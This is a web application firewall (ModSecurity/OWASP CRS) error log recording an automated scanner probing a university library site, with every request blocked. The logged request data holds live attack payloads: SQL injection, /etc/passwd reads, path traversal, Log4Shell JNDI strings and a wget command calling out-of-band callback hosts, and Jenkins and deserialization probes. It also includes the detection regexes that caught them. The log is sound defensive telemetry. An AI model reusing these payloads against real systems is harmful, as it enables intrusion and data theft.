[Tue Aug 29 11:32:25.365481 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAANWgawAAAAG"]
[Tue Aug 29 11:32:27.988459 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAANWgbIAAAAG"]
[Tue Aug 29 11:32:28.559994 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAANWgbkAAAAG"]
[Tue Aug 29 11:32:30.304240 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAARIwIkAAAAO"]
[Tue Aug 29 11:32:31.312006 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAAQOv98AAAAw"]
[Tue Aug 29 11:32:32.339095 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAAQ9H4MAAAAK"]
[Tue Aug 29 11:32:32.393399 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAAN9sW4AAAAJ"]
[Tue Aug 29 11:32:32.393439 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAAN9sW4AAAAJ"]
[Tue Aug 29 11:32:35.365349 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg45n3cwbcd48ot.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg45n3cwbcd48ot.oast.site}: ${jndi:ldap://${hostName}.cookievalue.cjmn8l5jmimk2adbbnlg6oxiqf5b48sc7.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO1048Co-f0AAAPDoHUAAAAP"]
[Tue Aug 29 11:32:36.379732 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAARNk5MAAAAS"]
[Tue Aug 29 11:32:37.454873 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAAPDoHkAAAAP"]
[Tue Aug 29 11:32:38.385355 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAARH7IsAAAAM"]
[Tue Aug 29 11:32:38.425508 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAARIwJwAAAAO"]
[Tue Aug 29 11:32:40.411768 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgamhn1igsk4e4i.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAAN9sX4AAAAJ"]
[Tue Aug 29 11:32:42.479606 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAARMMdwAAAAR"]
[Tue Aug 29 11:32:46.428045 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARIwLMAAAAO"]
[Tue Aug 29 11:32:47.543169 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARH7KQAAAAM"]
[Tue Aug 29 11:32:47.592189 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARMMeMAAAAR"]
[Tue Aug 29 11:32:49.413007 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within XML: \\x0a\\x0a\\x0a\\x0a\\x0arO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\\x0agetUnsavedChanges\\x0arO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubm..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO108cCo-f0AAAQKOf0AAAAs"]
[Tue Aug 29 11:32:49.617424 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARMMeoAAAAR"]
[Tue Aug 29 11:32:51.480924 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAARR23sAAAAF"]
[Tue Aug 29 11:32:59.319731 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARTEKQAAAAG"]
[Tue Aug 29 11:32:59.361014 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAAPDoJsAAAAP"]
[Tue Aug 29 11:32:59.806562 2023] [:error] [pid 1111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgw8xspcyoogo87.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARXH8AAAAAI"]
[Tue Aug 29 11:33:05.783924 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAARA7dAAAAAA"]
[Tue Aug 29 11:33:09.423732 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAANsAbkAAAAD"]
[Tue Aug 29 11:33:09.924829 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/app"] [unique_id "ZO11BcCo-f0AAARD1SEAAAAH"]
[Tue Aug 29 11:33:10.344942 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/app"] [unique_id "ZO11BsCo-f0AAARR26EAAAAF"]
[Tue Aug 29 11:33:11.307581 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAAQKOiQAAAAs"]
[Tue Aug 29 11:33:12.534236 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARR26sAAAAF"]
